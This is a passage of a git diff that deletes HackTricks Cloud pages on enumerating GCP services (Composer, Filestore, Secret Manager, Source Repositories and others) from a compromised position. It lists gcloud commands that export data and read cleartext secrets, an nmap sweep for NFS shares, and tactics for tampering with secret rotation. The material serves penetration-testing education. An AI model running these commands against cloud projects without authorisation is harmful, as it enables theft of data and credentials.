-[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-cloud-sql-persistence.md" %} -[gcp-cloud-sql-persistence.md](../gcp-persistence/gcp-cloud-sql-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md deleted file mode 100644 index f238feb32..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md +++ /dev/null @@ -1,71 +0,0 @@ -# GCP - Composer Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Google Cloud Composer** is a fully managed **workflow orchestration service** built on **Apache Airflow**. It enables you to author, schedule, and monitor pipelines that span across clouds and on-premises data centers. With GCP Composer, you can easily integrate your workflows with other Google Cloud services, facilitating efficient data integration and analysis tasks. This service is designed to simplify the complexity of managing cloud-based data workflows, making it a valuable tool for data engineers and developers handling large-scale data processing tasks. - -### Enumeration - -{% code overflow="wrap" %} -```bash -# Get envs info -gcloud composer environments list --locations -gcloud composer environments describe --location - -# Get list of dags -gcloud composer environments storage dags list --environment --location -# Download dags code -mkdir /tmp/dags -gcloud composer environments storage dags export --environment --location --destination /tmp/dags - -# List Data from composer -gcloud composer environments storage data list --environment --location -# Download data -mkdir /tmp/data -gcloud composer environments storage data export --environment --location --destination /tmp/data - -# List Plugins from composer -gcloud composer environments storage plugins list --environment --location -# Download plugins -mkdir /tmp/plugins -gcloud composer environments storage data export --environment --location --destination /tmp/plugins -``` -{% endcode %} - -### Privesc - -In the following page you can check how to **abuse composer permissions to escalate privileges**: - -{% content-ref url="../gcp-privilege-escalation/gcp-composer-privesc.md" %} -[gcp-composer-privesc.md](../gcp-privilege-escalation/gcp-composer-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice 
GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md deleted file mode 100644 index 136c2dcce..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md +++ /dev/null @@ -1,51 +0,0 @@ -# GCP - DNS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## GCP - Cloud DNS - -Google Cloud DNS is a high-performance, resilient, global Domain Name System (DNS) service. - -```bash -# This will usually error if DNS service isn't configured in the project -gcloud dns project-info describe - -# Get DNS zones & records -gcloud dns managed-zones list -gcloud dns managed-zones describe -gcloud dns record-sets list --zone # Get record of the zone - -# Policies -## A response policy is a collection of selectors that apply to queries made against one or more virtual private cloud networks. -gcloud dns response-policies list -## DNS policies control internal DNS server settings. You can apply policies to DNS servers on Google Cloud Platform VPC networks you have access to. -gcloud dns policies list -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md deleted file mode 100644 index d60c12b00..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md +++ /dev/null @@ -1,105 +0,0 @@ -# GCP - Filestore Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Filestore is a **managed file storage service** tailored for applications in need of both a **filesystem interface and a shared filesystem for data**. This service excels by offering high-performance file shares, which can be integrated with various GCP services. Its utility shines in scenarios where traditional file system interfaces and semantics are crucial, such as in media processing, content management, and the backup of databases. - -You can think of this like any other **NFS** **shared document repository -** a potential source of sensitive info. - -### Connections - -When creating a Filestore instance it's possible to **select the network where it's going to be accessible**. - -Moreover, by **default all clients on the selected VPC network and region are going to be able to access it**, however, it's possible to **restrict the access also by IP address** or range and indicate the access privilege (Admin, Admin Viewer, Editor, Viewer) user the client is going to get **depending on the IP address.** - -It can also be accessible via a **Private Service Access Connection:** - -* Are per VPC network and can be used across all managed services such as Memorystore, Tensorflow and SQL. -* Are **between your VPC network and network owned by Google using a VPC peering**, enabling your instances and services to communicate exclusively by **using internal IP addresses**. -* Create an isolated project for you on the service-producer side, meaning no other customers share it. You will be billed for only the resources you provision. -* The VPC peering will import new routes to your VPC - -### Backups - -It's possible to create **backups of the File shares**. These can be later **restored in the origin** new Fileshare instance or in **new ones**. 
- -### Encryption - -By default a **Google-managed encryption key** will be used to encrypt the data, but it's possible to select a **Customer-managed encryption key (CMEK)**. - -### Enumeration - -If you find a filestore available in the project, you can **mount it** from within your compromised Compute Instance. Use the following command to see if any exist. - -{% code overflow="wrap" %} -```bash -# Instances -gcloud filestore instances list # Check the IP address -gcloud filestore instances describe --zone # Check IP and access restrictions - -# Backups -gcloud filestore backups list -gcloud filestore backups describe --region - -# Search for NFS shares in a VPC subnet -sudo nmap -n -T5 -Pn -p 2049 --min-parallelism 100 --min-rate 1000 --open 10.99.160.2/20 -``` -{% endcode %} - -{% hint style="danger" %} -Note that a filestore service might be in a **completely new subnetwork created for it** (inside a Private Service Access Connection, which is a **VPC peer**).\ -So you might need to **enumerate VPC peers** to also run nmap over those network ranges. 
-
-{% code overflow="wrap" %}
-```bash
-# Get peerings
-gcloud compute networks peerings list
-# Get routes imported from a peering
-gcloud compute networks peerings list-routes --network= --region= --direction=INCOMING
-```
-{% endcode %}
-{% endhint %}
-
-### Privilege Escalation & Post Exploitation
-
-There aren't ways to escalate privileges in GCP directly abusing this service, but using some **Post Exploitation tricks it's possible to get access to the data** and maybe you can find some credentials to escalate privileges:
-
-{% content-ref url="../gcp-post-exploitation/gcp-filestore-post-exploitation.md" %}
-[gcp-filestore-post-exploitation.md](../gcp-post-exploitation/gcp-filestore-post-exploitation.md)
-{% endcontent-ref %}
-
-### Persistence
-
-{% content-ref url="../gcp-persistence/gcp-filestore-persistence.md" %}
-[gcp-filestore-persistence.md](../gcp-persistence/gcp-filestore-persistence.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md
deleted file mode 100644
index 4eb8b93c3..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md
+++ /dev/null
@@ -1,43 +0,0 @@
-# GCP - Firestore Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
-
-Cloud Firestore, provided by Firebase and Google Cloud, is a **database that is both scalable and flexible, catering to mobile, web, and server development needs**. Its functionalities are akin to those of Firebase Realtime Database, ensuring data synchronization across client applications with realtime listeners. A significant feature of Cloud Firestore is its support for offline operations on mobile and web platforms, enhancing app responsiveness even in conditions of high network latency or absence of internet connection. Moreover, it is designed to integrate smoothly with other products from Firebase and Google Cloud, such as Cloud Functions.
-
-```bash
-gcloud firestore indexes composite list
-gcloud firestore indexes composite describe
-gcloud firestore indexes fields list
-gcloud firestore indexes fields describe
-gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios'
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md
deleted file mode 100644
index 169225779..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# GCP - Memorystore Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Memorystore
-
-Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more.
-
-```bash
-# Memcache
-gcloud memcache instances list --region
-gcloud memcache instances describe --region
-# You should try to connect to the memcache instances to access the data
-
-# Redis
-gcloud redis instances list --region
-gcloud redis instances describe --region
-gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md
deleted file mode 100644
index d19210668..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md
+++ /dev/null
@@ -1,85 +0,0 @@
-# GCP - Monitoring Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-Google Cloud Monitoring offers a suite of tools to **monitor**, troubleshoot, and improve the performance of your cloud resources. From a security perspective, Cloud Monitoring provides several features that are crucial for maintaining the security and compliance of your cloud environment:
-
-### Policies
-
-Policies **define conditions under which alerts are triggered and how notifications are sent**. They allow you to monitor specific metrics or logs, set thresholds, and determine where and how to send alerts (like email or SMS).
-
-### Dashboards
-
-Monitoring Dashboards in GCP are customizable interfaces for visualizing the **performance and status of cloud resources**. They offer real-time insights through charts and graphs, aiding in efficient system management and issue resolution.
-
-### Channels
-
-Different **channels** can be configured to **send alerts** through various methods, including **email**, **SMS**, **Slack**, and more.
-
-Moreover, when an alerting policy is created in Cloud Monitoring, it's possible to **specify one or more notification channels**.
-
-### Snoozers
-
-A snoozer will **prevent the indicated alert policies to generate alerts or send notifications** during the indicated snoozing period. Additionally, when a snooze is applied to a **metric-based alerting policy**, Monitoring proceeds to **resolve any open incidents** that are linked to that specific policy.
-
-### Enumeration
-
-{% code overflow="wrap" %}
-```bash
-# Get policies
-gcloud alpha monitoring policies list
-gcloud alpha monitoring policies describe
-
-# Get dashboards
-gcloud monitoring dashboards list
-gcloud monitoring dashboards describe
-
-# Get snoozers
-gcloud monitoring snoozes list
-gcloud monitoring snoozes describe
-
-# Get Channels
-gcloud alpha monitoring channels list
-gcloud alpha monitoring channels describe
-```
-{% endcode %}
-
-### Post Exploitation
-
-{% content-ref url="../gcp-post-exploitation/gcp-monitoring-post-exploitation.md" %}
-[gcp-monitoring-post-exploitation.md](../gcp-post-exploitation/gcp-monitoring-post-exploitation.md)
-{% endcontent-ref %}
-
-## References
-
-* [https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli](https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md
deleted file mode 100644
index 87ea24f72..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md
+++ /dev/null
@@ -1,79 +0,0 @@
-# GCP - Secrets Manager Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Secret Manager
-
-Google [**Secret Manager**](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, files (max 64KB) and other sensitive data.
-
-A secret can have **different versions storing different data**.
-
-Secrets by **default** are **encrypted using a Google managed key**, but it's **possible to select a key from KMS** to use to encrypt the secret.
-
-Regarding **rotation**, it's possible to configure **messages to be sent to pub-sub every number of days**, the code listening to those messages can **rotate the secret**.
-
-It's possible to configure a day for **automatic deletion**, when the indicated day is **reached**, the **secret will be automatically deleted**.
-
-### Enumeration
-
-```bash
-# First, list the entries
-gcloud secrets list
-gcloud secrets get-iam-policy
-
-# Then, pull the clear-text of any version of any secret
-gcloud secrets versions list
-gcloud secrets versions access 1 --secret=""
-```
-
-### Privilege Escalation
-
-In the following page you can check how to **abuse secretmanager permissions to escalate privileges.**
-
-{% content-ref url="../gcp-privilege-escalation/gcp-secretmanager-privesc.md" %}
-[gcp-secretmanager-privesc.md](../gcp-privilege-escalation/gcp-secretmanager-privesc.md)
-{% endcontent-ref %}
-
-### Post Exploitation
-
-{% content-ref url="../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md" %}
-[gcp-secretmanager-post-exploitation.md](../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
-{% endcontent-ref %}
-
-### Persistence
-
-{% content-ref url="../gcp-persistence/gcp-secret-manager-persistence.md" %}
-[gcp-secret-manager-persistence.md](../gcp-persistence/gcp-secret-manager-persistence.md)
-{% endcontent-ref %}
-
-### Rotation misuse
-
-An attacker could update the secret to **stop rotations** (so it won't be modified), or **make rotations much less often** (so the secret won't be modified)
or to **publish the rotation message to a different pub/sub**, or modifying the rotation code being executed (this happens in a different service, probably in a Clound Function, so the attacker will need privileged access over the Cloud Function or any other service)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md
deleted file mode 100644
index 764278cea..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md
+++ /dev/null
@@ -1,95 +0,0 @@
-# GCP - Source Repositories Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-Google Cloud Source Repositories is a fully-featured, scalable, **private Git repository service**. It's designed to **host your source code in a fully managed environment**, integrating seamlessly with other GCP tools and services. It offers a collaborative and secure place for teams to store, manage, and track their code.
-
-Key features of Cloud Source Repositories include:
-
-1. **Fully Managed Git Hosting**: Offers the familiar functionality of Git, meaning you can use regular Git commands and workflows.
-2. **Integration with GCP Services**: Integrates with other GCP services like Cloud Build, Pub/Sub, and App Engine for end-to-end traceability from code to deployment.
-3. **Private Repositories**: Ensures your code is stored securely and privately. You can control access using Cloud Identity and Access Management (IAM) roles.
-4. **Source Code Analysis**: Works with other GCP tools to provide automated analysis of your source code, identifying potential issues like bugs, vulnerabilities, or bad coding practices.
-5. **Collaboration Tools**: Supports collaborative coding with tools like merge requests, comments, and reviews.
-6. **Mirror Support**: Allows you to connect Cloud Source Repositories with repositories hosted on GitHub or Bitbucket, enabling automatic synchronization and providing a unified view of all your repositories.
-
-### OffSec information
-
-* The source repositories configuration inside a project will have a **Service Account** used to publishing Cloud Pub/Sub messages. The default one used is the **Compute SA**. However, **I don't think it's possible steal its token** from Source Repositories as it's being executed in the background.
-* To see the code inside the GCP Cloud Source Repositories web console ([https://source.cloud.google.com/](https://source.cloud.google.com/)), you need the code to be **inside master branch by default**.
-* You can also **create a mirror Cloud Repository** pointing to a repo from **Github** or **Bitbucket** (giving access to those platforms).
-* It's possible to **code & debug from inside GCP**.
-* By default, Source Repositories **prevents private keys to be pushed in commits**, but this can be disabled.
-
-### Open In Cloud Shell
-
-It's possible to open the repository in Cloud Shell, a prompt like this one will appear:
-
-
-
-This will allow you to code and debug in Cloud Shell (which could get cloudshell compromised).
-
-### Enumeration
-
-{% code overflow="wrap" %}
-```bash
-# Repos enumeration
-gcloud source repos list #Get names and URLs
-gcloud source repos describe
-gcloud source repos get-iam-policy
-
-# gcloud repo clone
-gcloud source repos clone
-gcloud source repos get-iam-policy
-... git add & git commit -m ...
-git push --set-upstream origin master
-git push -u origin master
-
-# Access via git
-## To add a SSH key go to https://source.cloud.google.com/user/ssh_keys (no gcloud command)
-git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/
-git add, commit, push...
-```
-{% endcode %}
-
-### Privilege Escalation & Post Exploitation
-
-{% content-ref url="../gcp-privilege-escalation/gcp-sourcerepos-privesc.md" %}
-[gcp-sourcerepos-privesc.md](../gcp-privilege-escalation/gcp-sourcerepos-privesc.md)
-{% endcontent-ref %}
-
-### Unauthenticated Enum
-
-{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md" %}
-[gcp-source-repositories-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md
deleted file mode 100644
index 7f6921598..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md
+++ /dev/null
@@ -1,57 +0,0 @@
-# GCP - Spanner Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
-
-Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability.
-
-```bash
-# Cloud Spanner
-## Instances
